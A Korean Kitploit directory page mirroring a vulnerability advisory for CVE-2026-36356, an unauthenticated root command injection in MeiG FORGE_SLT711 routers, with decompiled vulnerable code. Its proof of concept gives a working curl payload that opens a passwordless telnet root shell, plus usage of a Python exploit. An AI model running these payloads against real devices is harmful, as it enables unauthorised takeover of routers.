Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - 인증되지 않은 OS 명령 주입 (루트 권한 RCE) | Kitploit
도구/GitHubGitHub/totekuh/cve-2026-36356
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - 인증되지 않은 OS 명령 주입 (루트 권한 RCE)

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — 인증되지 않은 OS 명령 주입 (/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • 발견자: Daniil Gordeev
  • 공개일: 2026-05-03

요약

MeiG Smart FORGE_SLT711 4G LTE CPE 장치에 번들로 포함된 GoAhead 웹 서버는 인증되지 않은 HTTP 엔드포인트 /action/SetRemoteAccessCfg를 노출하며, 이 엔드포인트는 사용자가 제어하는 JSON 입력을 검증 없이 셸 명령에 삽입합니다. 인증되지 않은 POST 요청 한 번으로 root 권한의 임의 명령이 실행됩니다.

두 가지 독립적인 근본 원인이 있습니다: 인증 라우트 항목 누락과 핸들러의 안전하지 않은 sprintf() → system() 구문입니다.

영향받는 제품

  • 공급업체: MeiG Smart Technology Co., Ltd. (선전, 중국)
  • 제품: FORGE_SLT711 4G LTE CPE 라우터
  • 확인된 펌웨어: MDM9607.LE.1.0-00110-STD.PROD-1 (모뎀 펌웨어 BC-MGST711H_1.1.1_EQ101)
  • 웹 서버: GoAhead 3.x (Embedthis) + MeiG 맞춤형 액션 핸들러 (/usr/bin/goahead)

취약한 코드는 업스트림 GoAhead가 아닌 MeiG의 맞춤형 액션 핸들러에 있습니다. 이 제품 라인의 다른 펌웨어 버전도 영향을 받을 가능성이 높지만, 독립적으로 검증되지는 않았습니다.

테스트 환경

장치Ortel 4G LTE CPE (OEM: MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
커널Linux 3.18.48
펌웨어MDM9607.LE.1.0-00110-STD.PROD-1
날짜2026-02-21

기술적 세부 사항

인증 누락 (CWE-306)

GoAhead 라우트 구성 파일 /var/www/route.txt에는 auth=basic을 사용하는 인증된 라우트(64–150행)가 나열되어 있습니다. /action/SetRemoteAccessCfg는 이 목록에 없습니다. 라우팅은 156행의 catch-all로 넘어갑니다:

root@kitploit:~
route uri=/action handler=action

catch-all에는 auth=basic이 없으므로 모든 HTTP 클라이언트가 자격 증명 없이 /action/SetRemoteAccessCfg를 호출할 수 있습니다.

명령 주입 (CWE-78)

/usr/bin/goahead의 오프셋 0x0003c6d8에 있는 핸들러는 다음과 같이 디컴파일됩니다:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

password 필드는 큰따옴표 안에 삽입됩니다. $(...) 치환과 `...` 백틱은 큰따옴표 안에서 확장되므로 공격자가 셸 명령을 제어할 수 있습니다. GoAhead 프로세스가 root로 실행되므로 system()은 uid=0으로 실행됩니다. 입력 검증, 이스케이프 처리, 문자 허용 목록이 전혀 없습니다.

개념 증명

지속형 텔넷 백도어

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

인증 없는 RCE → /action/SetRemoteAccessCfg를 통한 MeiG FORGE_SLT711(Ortel 4G LTE CPE)의 root 셸

참조 Python 익스플로잇

poc_rce.py (이 권고와 함께 공개됨):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

익스플로잇은 블라인드 방식입니다 — 명령 출력이 HTTP 응답에 포함되지 않습니다.

페이로드 제약 사항

  • password 버퍼: 64바이트
  • 최종 명령 버퍼: 256바이트
도구 다운로드